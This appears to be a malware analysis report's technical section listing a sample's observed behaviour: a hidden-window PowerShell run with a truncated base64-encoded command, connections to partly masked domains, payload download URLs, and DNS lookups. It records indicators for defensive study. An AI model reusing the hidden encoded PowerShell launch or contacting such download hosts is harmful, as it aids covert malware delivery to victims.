Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e KAAnAEYATAA2AG4AcwBhACcAKwAnAGQAJwArACcAYQAnACsAJwBzAGQAIAAnACsAJwA9ACAAJwArACcAJgAnACsAJwAoAG4AJwArACcAVQBlAG4AbgBVAGUAKwBuAFUAZQBlAG4AVQBlACsAbgAnACsAJwBVAGUAdwAtAG8AYg...
- 'in###gueweb.com':80
- 'ty####.tybit.com':80
- 'ma###awards.com':443
- 'pr###net.co.jp':80
- 'pr###net.co.jp':443
- 'ma##gin.net':80
- 'ma##gin.net':443
- http://in###gueweb.com/iQV6A/
- http://ty####.tybit.com/?na##################
- http://pr###net.co.jp/u6CdB/
- http://ma##gin.net/KexaQ/
- 'ma###awards.com':443
- 'pr###net.co.jp':443
- 'ma##gin.net':443
- DNS ASK in###gueweb.com
- DNS ASK ty####.tybit.com
- DNS ASK ma###awards.com
- DNS ASK pr###net.co.jp
- DNS ASK ma##gin.net
- DNS ASK tu###onsult.nl
- DNS ASK tu####ternet.com.br
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e KAAnAEYATAA2AG4AcwBhACcAKwAnAGQAJwArACcAYQAnACsAJwBzAGQAIAAnACsAJwA9ACAAJwArACcAJgAnACsAJwAoAG4AJwArACcAVQBlAG4AbgBVAGUAKwBuAFUAZQBlAG4AVQBlACsAbgAnACsAJwBVAGUAdwAtAG8AYg...' (with hidden window)